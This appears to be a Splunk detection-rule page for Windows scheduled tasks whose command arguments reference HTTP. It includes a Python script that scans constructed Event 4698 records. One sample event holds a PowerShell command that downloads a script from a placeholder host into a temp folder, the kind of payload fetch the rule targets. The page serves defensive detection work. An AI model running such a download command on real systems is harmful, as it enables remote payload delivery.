Schedule Task with HTTP Command Arguments

Splunk Security Content

Summary
This rule detects the creation of scheduled tasks on Windows systems whose command arguments reference HTTP, using Windows Security Event Code 4698. Scheduled tasks can be created via `schtasks.exe` or through the TaskService, and HTTP in a task's command is often associated with malicious activity such as the use of Living off the Land binaries (lolbins) to fetch additional payloads. Such actions carry significant risks, including data exfiltration, malware distribution, and unauthorized access, and warrant prompt investigation. Implementing this detection requires ingesting the Windows Event Logs that record task-scheduling activity, and the search should be tuned to filter out known legitimate scheduled tasks in a given environment.
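The following Python script is an added illustration of the detection logic described above; it is not Splunk's own search and the three Event 4698/4699 records it scans are constructed to mimic the shape of Windows Security event XML (assumed field names `TaskName`, `SubjectUserName` and `TaskContent`, with the task definition embedded as escaped XML). It parses the embedded task definition and flags only `Exec` actions whose `Command` or `Arguments` contain `http`, ignores non-4698 events, and includes the naive whole-string check that a tuned rule must avoid, since every task definition carries the Task Scheduler schema URI, which itself begins with `http`.

```python
"""Flag Windows Security Event 4698 (scheduled task created) whose Exec action
references HTTP in its command or arguments.  Added example, not Splunk's
detection code; the sample events below are constructed."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional
from xml.sax.saxutils import escape

# Namespaces used by Windows event XML and by Task Scheduler task definitions.
EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}


@dataclass
class Finding:
    task_name: str
    subject: str
    command: str
    arguments: str


def _event_data(root: ET.Element, name: str) -> str:
    """Return the text of <Data Name=...> inside EventData ('' if absent)."""
    node = root.find(f"./e:EventData/e:Data[@Name='{name}']", EVT_NS)
    return (node.text or "") if node is not None else ""


def check_4698(event_xml: str) -> Optional[Finding]:
    """Return a Finding if this 4698 event's task runs an HTTP-referencing command."""
    root = ET.fromstring(event_xml)
    if root.findtext("./e:System/e:EventID", default="", namespaces=EVT_NS) != "4698":
        return None  # 4699 (deleted), 4702 (updated) etc. are out of scope here
    task_xml = _event_data(root, "TaskContent")
    if not task_xml:
        return None
    task = ET.fromstring(task_xml)
    # Inspect only Exec actions: a substring search over the raw TaskContent
    # would fire on every task because the schema's xmlns URI starts with http.
    for exec_node in task.iterfind(".//t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
        arguments = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS)
        if "http" in f"{command} {arguments}".lower():
            return Finding(
                task_name=_event_data(root, "TaskName"),
                subject=_event_data(root, "SubjectUserName"),
                command=command,
                arguments=arguments,
            )
    return None


def scan_events(events: List[str]) -> List[Finding]:
    """Run check_4698 over a batch of raw event XML strings."""
    return [f for f in (check_4698(e) for e in events) if f is not None]


def naive_string_match(event_xml: str) -> bool:
    """The check to avoid: 'http' anywhere in TaskContent (always true)."""
    root = ET.fromstring(event_xml)
    return "http" in _event_data(root, "TaskContent").lower()


def make_event(event_id: str, task_name: str, user: str, command: str, arguments: str) -> str:
    """Build a constructed event in the shape of Windows Security event XML."""
    task_xml = (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        f"<Actions><Exec><Command>{escape(command)}</Command>"
        f"<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>"
    )
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        f"<System><EventID>{event_id}</EventID><Channel>Security</Channel></System>"
        f'<EventData><Data Name="SubjectUserName">{escape(user)}</Data>'
        f'<Data Name="TaskName">{escape(task_name)}</Data>'
        f'<Data Name="TaskContent">{escape(task_xml)}</Data></EventData></Event>'
    )


# Constructed sample events: a benign backup task, a task fetching a script over
# HTTP (placeholder host), and a 4699 deletion event that must not alert.
SAMPLE_EVENTS = [
    make_event("4698", r"\Backup\Nightly", "svc-backup",
               r"C:\Windows\System32\cmd.exe", r"/c robocopy D:\data E:\backup /MIR"),
    make_event("4698", r"\Updater", "jdoe", "powershell.exe",
               '-NoProfile -Command "Invoke-WebRequest http://files.example.invalid/update.ps1 -OutFile C:\\Temp\\u.ps1"'),
    make_event("4699", r"\Updater", "jdoe", "powershell.exe",
               "-Command http://files.example.invalid/x"),
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"ALERT task={finding.task_name} user={finding.subject} "
              f"cmd={finding.command} args={finding.arguments}")
```

Run as-is it prints one alert for the `\Updater` task. The per-environment tuning the summary calls for would be an allow-list of task names or command paths checked before `Finding` is returned; the `naive_string_match` helper is kept only to show why the match must be scoped to the `Exec` fields rather than the whole `TaskContent` blob.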
Categories
  • Windows
  • Endpoint
Data Sources
  • Windows Registry
  • Application Log
ATT&CK Techniques
  • T1053
  • T1053.005
Created: 2024-12-10